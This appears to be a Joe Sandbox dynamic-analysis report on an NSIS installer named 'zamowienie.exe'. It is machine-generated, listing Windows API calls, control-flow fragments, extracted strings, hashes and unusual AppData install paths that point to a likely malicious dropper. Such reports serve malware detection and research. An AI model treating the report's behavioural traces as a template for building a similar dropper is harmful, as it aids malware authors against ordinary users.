                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentExpandStringslstrcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1938659011-0
                                                                                                                                              • Opcode ID: e097cbf55bda460d24c5fab538e2d6bfabf44bcb5d93b52c9185126c412d543b
                                                                                                                                              • Instruction ID: 39fb2ba549112c13cfccdacc37b8b71097d554826537bdd4f7b55880e0a0b00b
                                                                                                                                              • Opcode Fuzzy Hash: e097cbf55bda460d24c5fab538e2d6bfabf44bcb5d93b52c9185126c412d543b
                                                                                                                                              • Instruction Fuzzy Hash: 6DF08C31B01201EBCB20CF669E48AAF7EA8EFA1355B10803BE145F61A0D6788643DF1C
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNELBASE(75923410,004221A0,00421D58,00405E81,00421D58,00421D58,00000000,00421D58,00421D58,75923410,?,75922EE0,00405BA0,?,75923410,75922EE0), ref: 0040675C
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406768
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: f2e23ad87d5570838264cbfd82f2bc45b63f49524226958c9645f8cb89411b00
                                                                                                                                              • Instruction ID: c8da4e672578e7cfa4b104c07fec31ec7e4793a54b14b92e18f5f0a10be287ac
                                                                                                                                              • Opcode Fuzzy Hash: f2e23ad87d5570838264cbfd82f2bc45b63f49524226958c9645f8cb89411b00
                                                                                                                                              • Instruction Fuzzy Hash: D2D012315050206BC2401738AE0CC5B7AA99F193357518B37F5B6F21F0C7748C32C69C

                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404E7A
                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404E87
                                                                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 00404ED6
                                                                                                                                              • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404EED
                                                                                                                                              • SetWindowLongA.USER32(?,?,00405476), ref: 00404F07
                                                                                                                                              • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404F19
                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404F2D
                                                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404F43
                                                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404F4F
                                                                                                                                              • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404F5F
                                                                                                                                              • DeleteObject.GDI32(00000110), ref: 00404F64
                                                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404F8F
                                                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404F9B
                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00405035
                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00405065
                                                                                                                                                • Part of subcall function 00404493: SendMessageA.USER32(?,?,?,004042C3), ref: 004044A1
                                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00405079
                                                                                                                                              • GetWindowLongA.USER32(?,?), ref: 004050A7
                                                                                                                                              • SetWindowLongA.USER32(?,?,00000000), ref: 004050B5
                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 004050C5
                                                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 004051C0
                                                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405225
                                                                                                                                              • SendMessageA.USER32(?,?,00000000,00000000), ref: 0040523A
                                                                                                                                              • SendMessageA.USER32(?,00000420,00000000,?), ref: 0040525E
                                                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040527E
                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00405293
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004052A3
                                                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040531C
                                                                                                                                              • SendMessageA.USER32(?,00001102,?,?), ref: 004053C5
                                                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004053D4
                                                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 004053FF
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040544D
                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405458
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040545F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                              • String ID: $M$N
                                                                                                                                              • API String ID: 2564846305-813528018
                                                                                                                                              • Opcode ID: b84b5db26e268e8e4252558338ed57017ff44b35756f86841422fe8ceb23c02e
                                                                                                                                              • Instruction ID: 55de333454b24e32ae45244539792716bfd21411a43293e2b6f4d8f70d7fed6a
                                                                                                                                              • Opcode Fuzzy Hash: b84b5db26e268e8e4252558338ed57017ff44b35756f86841422fe8ceb23c02e
                                                                                                                                              • Instruction Fuzzy Hash: 24026EB0A00609AFDF20DF54DD45AAE7BB5FB44354F10813AEA14BA2E1C7798D82CF58

                                                                                                                                              APIs
                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                                                                                                              • ShowWindow.USER32(?), ref: 00403FC0
                                                                                                                                              • GetWindowLongA.USER32(?,?), ref: 00403FD2
                                                                                                                                              • ShowWindow.USER32(?,?), ref: 00403FEB
                                                                                                                                              • DestroyWindow.USER32 ref: 00403FFF
                                                                                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00404018
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00404037
                                                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 004040FD
                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404107
                                                                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00404121
                                                                                                                                              • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00404172
                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404218
                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404239
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404266
                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040427C
                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404283
                                                                                                                                              • SendMessageA.USER32(?,?,00000000,?), ref: 0040429B
                                                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                                                                                                              • lstrlenA.KERNEL32(00420950,?,00420950,00000000), ref: 004042D8
                                                                                                                                              • SetWindowTextA.USER32(?,00420950), ref: 004042E7
                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040441B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                              • String ID: PB
                                                                                                                                              • API String ID: 121052019-3672992855

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004067E6: GetModuleHandleA.KERNEL32(?,00000000,?,00403633,?), ref: 004067F8
                                                                                                                                                • Part of subcall function 004067E6: GetProcAddress.KERNEL32(00000000,?), ref: 00406813
                                                                                                                                              • lstrcatA.KERNEL32(1033,00420950,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420950,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\zamowienie.exe",0000000A,?), ref: 00403C42
                                                                                                                                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen,1033,00420950,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420950,00000000,00000002,75923410), ref: 00403CB7
                                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 00403CCA
                                                                                                                                              • GetFileAttributesA.KERNEL32(Call,?,"C:\Users\user\Desktop\zamowienie.exe",0000000A,?), ref: 00403CD5
                                                                                                                                              • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen), ref: 00403D1E
                                                                                                                                                • Part of subcall function 0040631C: wsprintfA.USER32 ref: 00406329
                                                                                                                                              • RegisterClassA.USER32(00423AE0), ref: 00403D5B
                                                                                                                                              • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403D73
                                                                                                                                              • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
                                                                                                                                              • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\zamowienie.exe",0000000A,?), ref: 00403DDE
                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00423AE0), ref: 00403E0A
                                                                                                                                              • GetClassInfoA.USER32(00000000,RichEdit,00423AE0), ref: 00403E17
                                                                                                                                              • RegisterClassA.USER32(00423AE0), ref: 00403E20
                                                                                                                                              • DialogBoxParamA.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: "C:\Users\user\Desktop\zamowienie.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen$Call$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$:B
                                                                                                                                              • API String ID: 1975747703-2541314629

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F95
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\zamowienie.exe,00000400), ref: 00402FB1
                                                                                                                                                • Part of subcall function 00405F51: GetFileAttributesA.KERNELBASE(00000003,00402FC4,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00405F55
                                                                                                                                                • Part of subcall function 00405F51: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F77
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\zamowienie.exe,C:\Users\user\Desktop\zamowienie.exe,80000000,00000003), ref: 00402FFA
                                                                                                                                              • GlobalAlloc.KERNELBASE(?,0000000A), ref: 0040313C
                                                                                                                                              Strings
                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403185
                                                                                                                                              • Error launching installer, xrefs: 00402FD1
                                                                                                                                              • C:\Users\user\Desktop, xrefs: 00402FDC, 00402FE1, 00402FE7
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F8B, 00403154
                                                                                                                                              • Null, xrefs: 00403078
                                                                                                                                              • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 004031D3
                                                                                                                                              • "C:\Users\user\Desktop\zamowienie.exe", xrefs: 00402F8A
                                                                                                                                              • C:\Users\user\Desktop\zamowienie.exe, xrefs: 00402F9B, 00402FAA, 00402FBE, 00402FDB
                                                                                                                                              • Inst, xrefs: 00403066
                                                                                                                                              • soft, xrefs: 0040306F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                              • String ID: "C:\Users\user\Desktop\zamowienie.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\zamowienie.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                              • API String ID: 2803837635-2402691860

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406583
                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,00420130,00000000,0040553A,00420130,00000000,00000000), ref: 00406599
                                                                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,Call,?,0040553A,00000007,?,00420130,00000000,0040553A,00420130,00000000), ref: 004065F8
                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,0040553A,00000007,?,00420130,00000000,0040553A,00420130,00000000), ref: 00406601
                                                                                                                                              • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00420130,00000000,0040553A,00420130,00000000), ref: 00406625
                                                                                                                                              • lstrlenA.KERNEL32(Call,?,00420130,00000000,0040553A,00420130,00000000,00000000,00000000,00000000), ref: 00406677
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                                                                                                              Control-flow Graph (entry block 40177e-4017a1; graph not reproduced)
                                                                                                                                              APIs
                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218,00000000,00000000,00000031), ref: 004017BD
                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218,00000000,00000000,00000031), ref: 004017E7
                                                                                                                                                • Part of subcall function 004063BE: lstrcpynA.KERNEL32(?,?,00000400,00403694,Noncomplacency,NSIS Error,?,?,0000000A,?), ref: 004063CB
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
                                                                                                                                                • Part of subcall function 00405502: lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                                • Part of subcall function 00405502: SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsz31BB.tmp$C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dll$C:\Users\user\AppData\Local\realmless\hovedvagts\chaperonen\Unrising218$Call

                                                                                                                                              Control-flow Graph (entry block 406778-406798; graph not reproduced)
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040678F
                                                                                                                                              • wsprintfA.USER32 ref: 004067C8
                                                                                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 004067DC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                              • String ID: %s%s.dll$UXTHEME$\

                                                                                                                                              Control-flow Graph (entry block 402d60-402d89; graph not reproduced)
                                                                                                                                              APIs
                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                              • String ID:

                                                                                                                                              Control-flow Graph (entry block 7340176b-734017a7; graph not reproduced)
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 73401B28: GlobalFree.KERNEL32(?), ref: 73401D99
                                                                                                                                                • Part of subcall function 73401B28: GlobalFree.KERNEL32(?), ref: 73401D9E
                                                                                                                                                • Part of subcall function 73401B28: GlobalFree.KERNEL32(?), ref: 73401DA3
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73401816
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 73401899
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 734018BE
                                                                                                                                                • Part of subcall function 7340233F: GlobalAlloc.KERNEL32(?,?), ref: 73402370
                                                                                                                                                • Part of subcall function 73402742: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,734017E7,00000000), ref: 73402812
                                                                                                                                                • Part of subcall function 734015FB: wsprintfA.USER32 ref: 73401629
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2469733546.0000000073401000.00000020.00000001.01000000.00000005.sdmp, Offset: 73400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                              • String ID:

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 813 401c53-401c73 call 402c3c * 2 818 401c75-401c7c call 402c5e 813->818 819 401c7f-401c83 813->819 818->819 821 401c85-401c8c call 402c5e 819->821 822 401c8f-401c95 819->822 821->822 823 401ce3-401d09 call 402c5e * 2 FindWindowExA 822->823 824 401c97-401cb3 call 402c3c * 2 822->824 838 401d0f 823->838 836 401cd3-401ce1 SendMessageA 824->836 837 401cb5-401cd1 SendMessageTimeoutA 824->837 836->838 839 401d12-401d15 837->839 838->839 840 402aea-402af9 839->840 841 401d1b 839->841 841->840
                                                                                                                                              APIs
                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2433466695.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433504126.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433527555.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2433633081.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                              • String ID: !

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 844 4024a3-4024d4 call 402c5e * 2 call 402cee 851 402aea-402af9 844->851 852 4024da-4024e4 844->852 854 4024f4-4024f7 852->854 855 4024e6-4024f3 call 402c5e lstrlenA 852->855 858 4024f9-40250d call 402c3c 854->858 859 40250e-402511 854->859 855->854 858->859 862 402522-402536 RegSetValueExA 859->862 863 402513-40251d call 403222 859->863 864 402538 862->864 865 40253b-402618 RegCloseKey 862->865 863->862 864->865 865->851
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000023,00000011,00000002), ref: 004024EE
                                                                                                                                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000000,00000011,00000002), ref: 0040252E
                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz31BB.tmp,00000000,00000011,00000002), ref: 00402612
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsz31BB.tmp

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 869 405f80-405f8a 870 405f8b-405fb6 GetTickCount GetTempFileNameA 869->870 871 405fc5-405fc7 870->871 872 405fb8-405fba 870->872 874 405fbf-405fc2 871->874 872->870 873 405fbc 872->873 873->874
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405F94
                                                                                                                                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,004034EF,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037CE,?,?), ref: 00405FAE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2433482511.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa

                                                                                                                                              Control-flow Graph

                                                                                                                                              control_flow_graph 875 4020ca-4020d6 876 402191-402193 875->876 877 4020dc-4020f2 call 402c5e * 2 875->877 879 40230a-40230f call 401423 876->879 886 402101-40210f LoadLibraryExA 877->886 887 4020f4-4020ff GetModuleHandleA 877->887 885 402aea-402af9 879->885 889 402111-40211e GetProcAddress 886->889 890 40218a-40218c 886->890 887->886 887->889 892 402120-402126 889->892 893 40215d-402162 call 405502 889->893 890->879 895 402128-402134 call 401423 892->895 896 40213f-402156 call 7340176b 892->896 897 402167-40216a 893->897 895->897 906 402136-40213d 895->906 899 402158-40215b 896->899 897->885 900 402170-402178 call 403b67 897->900 899->897 900->885 905 40217e-402185 FreeLibrary 900->905 905->885 906->897
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNELBASE(00000000,?,?), ref: 004020F5
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000,?), ref: 0040553B
                                                                                                                                                • Part of subcall function 00405502: lstrlenA.KERNEL32(Y/@,00420130,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F59,00000000), ref: 0040554B
                                                                                                                                                • Part of subcall function 00405502: lstrcatA.KERNEL32(00420130,0040A130,Y/@,00420130,00000000,00000000,00000000), ref: 0040555E
                                                                                                                                                • Part of subcall function 00405502: SetWindowTextA.USER32(00420130,00420130), ref: 00405570
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405596
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004055B0
                                                                                                                                                • Part of subcall function 00405502: SendMessageA.USER32(?,00001013,?,00000000), ref: 004055BE
